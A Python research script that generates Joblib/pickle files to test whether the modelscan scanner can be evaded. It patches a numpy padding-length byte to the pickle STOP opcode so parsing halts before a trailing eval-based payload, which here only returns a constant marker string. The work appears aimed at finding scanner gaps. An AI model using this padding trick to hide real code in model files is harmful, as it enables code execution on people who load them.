#!/usr/bin/env python3
"""Generate benign Joblib artifacts for numpy padding traversal checks."""

from __future__ import annotations

import argparse
import io
import json
import os
import pathlib
import pickletools
import re
import shutil
import subprocess
from dataclasses import dataclass
from typing import Any

import joblib
import numpy as np

# String the benign payload evaluates to; used to detect it after loading.
MARKER = "BENIGN_JOBLIB_MARKER"
# Byte value of the pickle STOP opcode (b".").
PICKLE_STOP = 0x2E
# Filler byte inserted when the padding run is lengthened.
JOBLIB_PADDING_BYTE = b"\xff"
PICKLE_PROTOCOL = 4


class BenignEval:
    """Benign unsafe-global marker: eval returns a constant string only."""

    def __reduce__(self) -> tuple[Any, tuple[str]]:
        # The eval argument is the repr of a module constant, never external
        # input, so unpickling only yields the MARKER string.
        return (eval, (repr(MARKER),))


@dataclass(frozen=True)
class PaddingPatch:
    """Bookkeeping for one padding-length rewrite done by patch_padding_to_stop."""

    # Offset of the padding-length byte in the original data.
    offset: int
    # Value of that byte before and after patching.
    original_length: int
    patched_length: int
    # Number of filler bytes added to the stream.
    inserted_bytes: int
    # Offset of the first byte after the padding, before and after patching.
    array_data_offset_before: int
    array_data_offset_after: int


def dump_joblib_bytes(value: Any) -> bytes:
    """Serialize *value* with joblib (uncompressed) and return the raw bytes."""
    buffer = io.BytesIO()
    joblib.dump(value, buffer, compress=0, protocol=PICKLE_PROTOCOL)
    return buffer.getvalue()


def find_first_numpy_padding(data: bytes) -> int:
    """Return the offset at which pickletools stops parsing *data*.

    The stream is walked with ``pickletools.genops`` until it raises
    ``ValueError``; the position reported in the error message is returned.
    Callers treat the byte at that offset as joblib's padding-length byte.

    Raises:
        RuntimeError: if parsing finishes without an error, if the error
            message carries no position, if the last opcode parsed before the
            stop was not ``BUILD``, or if ``numpy_array_alignment_bytes`` does
            not occur before the stop offset.
    """
    last_opcode: str | None = None
    try:
        for opcode, _arg, _pos in pickletools.genops(data):
            last_opcode = opcode.name
    except ValueError as exc:
        # genops reports the failing offset only inside the message text.
        match = re.search(r"position (\d+)", str(exc))
        if not match:
            raise RuntimeError(f"could not locate pickle parse stop: {exc}") from exc
        offset = int(match.group(1))
        if last_opcode != "BUILD":
            raise RuntimeError(
                "pickle parsing did not stop immediately after a numpy wrapper BUILD"
            )
        if b"numpy_array_alignment_bytes" not in data[:offset]:
            raise RuntimeError("joblib numpy alignment metadata was not found")
        return offset
    raise RuntimeError("expected raw numpy array bytes to interrupt pickle parsing")


def patch_padding_to_stop(data: bytes) -> tuple[bytes, PaddingPatch]:
    """Rewrite the padding-length byte to PICKLE_STOP and grow the padding.

    The length byte found by ``find_first_numpy_padding`` is replaced with
    ``PICKLE_STOP`` and enough ``JOBLIB_PADDING_BYTE`` filler is inserted
    directly after it so the padding run matches the new length.

    Returns:
        The patched bytes and a ``PaddingPatch`` describing the change.

    Raises:
        RuntimeError: if the original length is outside 1..64 or is already
            greater than or equal to ``PICKLE_STOP``.
    """
    offset = find_first_numpy_padding(data)
    original_length = data[offset]
    if not 1 <= original_length <= 64:
        raise RuntimeError(f"unexpected joblib padding length: {original_length}")
    if original_length >= PICKLE_STOP:
        raise RuntimeError(
            f"padding length {original_length} does not need a STOP-byte expansion"
        )

    inserted = PICKLE_STOP - original_length
    patched = (
        data[:offset]
        + bytes([PICKLE_STOP])
        + (JOBLIB_PADDING_BYTE * inserted)
        # The original padding bytes follow, so the run totals PICKLE_STOP bytes.
        + data[offset + 1 :]
    )
    patch = PaddingPatch(
        offset=offset,
        original_length=original_length,
        patched_length=PICKLE_STOP,
        inserted_bytes=inserted,
        array_data_offset_before=offset + 1 + original_length,
        array_data_offset_after=offset + 1 + PICKLE_STOP,
    )
    return patched, patch


def write_bytes(path: pathlib.Path, data: bytes) -> None:
    """Write *data* to *path*, creating parent directories as needed."""
    path.parent.mkdir(parents=True, exist_ok=True)
    path.write_bytes(data)


def load_status(path: pathlib.Path) -> dict[str, Any]:
    """Load *path* with joblib and describe the outcome as a JSON-friendly dict.

    On failure the dict has ``status == "error"`` and the exception type plus
    the first line of its message; on success it reports the loaded value's
    type, repr, and whether it contains MARKER.
    """
    try:
        value = joblib.load(path)
    except Exception as exc:  # best-effort probe: any load failure is reported
        # An exception with an empty message yields no lines at all, so guard
        # the lookup instead of indexing [0] unconditionally.
        message_lines = str(exc).splitlines()
        first_line = message_lines[0] if message_lines else ""
        return {
            "status": "error",
            "error": f"{type(exc).__name__}: {first_line}",
        }
    return {
        "status": "ok",
        "type": type(value).__name__,
        "repr": repr(value),
        "marker_found": contains_marker(value),
    }


def contains_marker(value: Any) -> bool:
    """Return True if *value* is MARKER or holds it in a dict/list/tuple.

    Strings match only on exact equality. Dict values (not keys) and
    list/tuple items are searched recursively; every other type is False.
    """
    if isinstance(value, str):
        return value == MARKER
    if isinstance(value, dict):
        return any(contains_marker(item) for item in value.values())
    if isinstance(value, (list, tuple)):
        return any(contains_marker(item) for item in value)
    return False


def opcode_positions(data: bytes, opcode_name: str, start: int = 0) -> list[int]:
    """Return absolute offsets of every *opcode_name* opcode from *start* on.

    Parsing begins at ``data[start:]``; the returned offsets are relative to
    the beginning of *data*.
    """
    return [
        start + pos
        for opcode, _arg, pos in pickletools.genops(data[start:])
        if opcode.name == opcode_name
    ]


def opcode_offsets(data: bytes) -> dict[str, int | None]:
    """Return byte offsets of a few landmarks in *data*, or None if absent.

    These are plain byte searches, not opcode-aware parsing:
    ``final_stop_opcode`` is simply the last occurrence of the STOP byte value.
    """
    last_stop = data.rfind(bytes([PICKLE_STOP]))
    return {
        "builtins_string": find_bytes(data, b"builtins"),
        "eval_string": find_bytes(data, b"eval"),
        "marker_string": find_bytes(data, MARKER.encode()),
        # Report a missing byte as None, matching the entries above.
        "final_stop_opcode": last_stop if last_stop >= 0 else None,
    }


def find_bytes(data: bytes, needle: bytes) -> int | None:
    """Return the first offset of *needle* in *data*, or None if not found."""
    offset = data.find(needle)
    return offset if offset >= 0 else None


def modelscan(path: pathlib.Path, command: pathlib.Path | None) -> dict[str, Any]:
    """Run the modelscan CLI on *path* and summarize its JSON report.

    Returns ``{"status": "skipped"}`` when *command* is None and a
    ``"missing"`` status when the command path does not exist. Otherwise the
    result carries the return code plus the version, issue count, and errors
    taken from the report, with ``status`` set to ``"parse_error"`` when
    stdout holds no parseable JSON object.
    """
    if command is None:
        return {"status": "skipped"}
    if not command.exists():
        return {"status": "missing", "command": str(command)}

    completed = subprocess.run(
        [
            str(command),
            "-p",
            str(path),
            "-r",
            "json",
            "--show-skipped",
        ],
        text=True,
        capture_output=True,
        # NOTE(review): the very wide COLUMNS presumably keeps the tool from
        # wrapping its output -- confirm against modelscan's behavior.
        env={**os.environ, "COLUMNS": "20000"},
        check=False,
    )
    stdout = completed.stdout.strip()

    # Skip anything printed before the first "{" and parse from there.
    parsed: dict[str, Any] = {"parse_error": stdout}
    json_start = stdout.find("{")
    if json_start >= 0:
        try:
            parsed = json.loads(stdout[json_start:])
        except json.JSONDecodeError:
            parsed = {"parse_error": stdout}

    # Only trust "summary" when it is actually a mapping; anything else is
    # treated as absent rather than crashing on .get().
    summary = parsed.get("summary")
    if not isinstance(summary, dict):
        summary = {}
    return {
        "status": "ok" if "parse_error" not in parsed else "parse_error",
        "returncode": completed.returncode,
        "modelscan_version": summary.get("modelscan_version"),
        "total_issues": summary.get("total_issues"),
        "errors": parsed.get("errors"),
    }


def summarize(
    case: str,
    path: pathlib.Path,
    modelscan_command: pathlib.Path | None,
    extra_offsets: dict[str, Any] | None = None,
) -> dict[str, Any]:
    """Build the per-artifact report: size, load status, offsets, scan result.

    *extra_offsets*, when given, is merged over the offsets computed by
    ``opcode_offsets``.
    """
    data = path.read_bytes()
    offsets: dict[str, Any] = opcode_offsets(data)
    if extra_offsets:
        offsets.update(extra_offsets)
    return {
        "case": case,
        "path": str(path),
        "size": len(data),
        "joblib_load": load_status(path),
        "offsets": offsets,
        "modelscan": modelscan(path, modelscan_command),
    }


def main() -> int:
    """Write the control and patched candidate artifacts and print reports.

    One JSON object per artifact is printed to stdout. Returns 0.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument(
        "output_dir",
        nargs="?",
        type=pathlib.Path,
        default=pathlib.Path("corpus/joblib_numpy_padding_probe"),
    )
    parser.add_argument(
        "--modelscan-command",
        type=pathlib.Path,
        default=None,
    )
    parser.add_argument("--skip-modelscan", action="store_true")
    args = parser.parse_args()

    modelscan_command = (
        None
        if args.skip_modelscan
        else resolve_modelscan_command(args.modelscan_command)
    )

    control_path = args.output_dir / "control_direct.joblib"
    candidate_path = (
        args.output_dir / "candidate_numpy_array_then_payload_patched.joblib"
    )

    # Control: the benign payload pickled on its own.
    control_bytes = dump_joblib_bytes(BenignEval())
    write_bytes(control_path, control_bytes)

    # Candidate: a numpy array followed by the payload, with the array's
    # padding-length byte rewritten to the STOP opcode value.
    array = np.array([PICKLE_STOP, 0, 1, 2, 3, 4, 5, 6], dtype=np.uint8)
    candidate_bytes = dump_joblib_bytes([array, BenignEval()])
    patched_candidate_bytes, patch = patch_padding_to_stop(candidate_bytes)
    write_bytes(candidate_path, patched_candidate_bytes)

    print(
        json.dumps(
            summarize(
                "control_direct",
                control_path,
                modelscan_command,
                {
                    "payload_reduce_opcode_offsets": opcode_positions(
                        control_bytes,
                        "REDUCE",
                    )
                },
            ),
            sort_keys=True,
        )
    )

    # The pickle stream resumes right after the raw array bytes.
    payload_frame_offset = patch.array_data_offset_after + array.nbytes
    print(
        json.dumps(
            summarize(
                "candidate_numpy_array_then_payload_patched",
                candidate_path,
                modelscan_command,
                {
                    "padding_length_offset": patch.offset,
                    "padding_original_length": patch.original_length,
                    "padding_patched_length": patch.patched_length,
                    "padding_inserted_bytes": patch.inserted_bytes,
                    "array_data_offset_before_patch": patch.array_data_offset_before,
                    "array_data_offset_after_patch": patch.array_data_offset_after,
                    "array_first_byte_after_patch": patched_candidate_bytes[
                        patch.array_data_offset_after
                    ],
                    "payload_frame_offset_after_patch": payload_frame_offset,
                    "payload_reduce_opcode_offsets_after_patch": opcode_positions(
                        patched_candidate_bytes,
                        "REDUCE",
                        payload_frame_offset,
                    ),
                },
            ),
            sort_keys=True,
        )
    )
    return 0


def resolve_modelscan_command(command: pathlib.Path | None) -> pathlib.Path | None:
    """Pick the modelscan executable to use.

    An explicit *command* wins. Otherwise the local virtualenv binary is
    preferred, then one found on PATH. If neither exists the local path is
    returned anyway so the caller can report it as missing.
    """
    if command is not None:
        return command
    local_command = pathlib.Path(".venv-modelscan/bin/modelscan")
    if local_command.exists():
        return local_command
    path_command = shutil.which("modelscan")
    if path_command is not None:
        return pathlib.Path(path_command)
    return local_command


if __name__ == "__main__":
    raise SystemExit(main())